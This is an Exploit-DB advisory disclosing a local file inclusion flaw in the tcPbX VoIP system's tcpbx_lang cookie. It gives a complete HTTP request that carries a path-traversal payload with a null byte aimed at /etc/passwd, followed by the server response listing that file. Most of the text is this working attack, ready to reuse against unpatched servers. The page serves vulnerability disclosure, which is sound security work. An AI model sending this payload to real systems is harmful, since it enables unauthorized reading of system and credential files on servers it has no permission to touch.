tcPbX - 'tcpbx_lang' Local File Inclusion

EDB-ID:

40278

CVE:

N/A


Author:

0x4148

Type:

webapps


Platform:

PHP

Date:

2016-08-19


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Vulnerable hardware : tcpbx voip distro
Vendor : www.tcpbx.org
Author : Ahmed sultan (@0x4148)
Email : 0x4148@gmail.com

Summary : According to the vendor's site ,
tcPbX is a complete and functional VoIP phone system based on Asterisk open
source software and CentOS operating system.
The simplified installation and the new administration portal allow you to
have a full featured phone system in less than an hour without specific
skills on linux or asterisk

Vulnerable file : /var/www/html/tcpbx/index.php
The software suffer from LFI flaw because of the tcpbx_lang parameter isn't
sanitized before being proceeded in the file

Request
GET /tcpbx/ HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:47.0)
Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: tcpbx_lang=../../../../../../../../../../etc/passwd%00;
PHPSESSID=cupsei1iqmv2bqa81pkcvg4jg1
Connection: close
Cache-Control: max-age=0
-----------------------------------
Response
HTTP/1.1 200 OK
Date: Fri, 19 Aug 2016 15:45:30 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23874

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin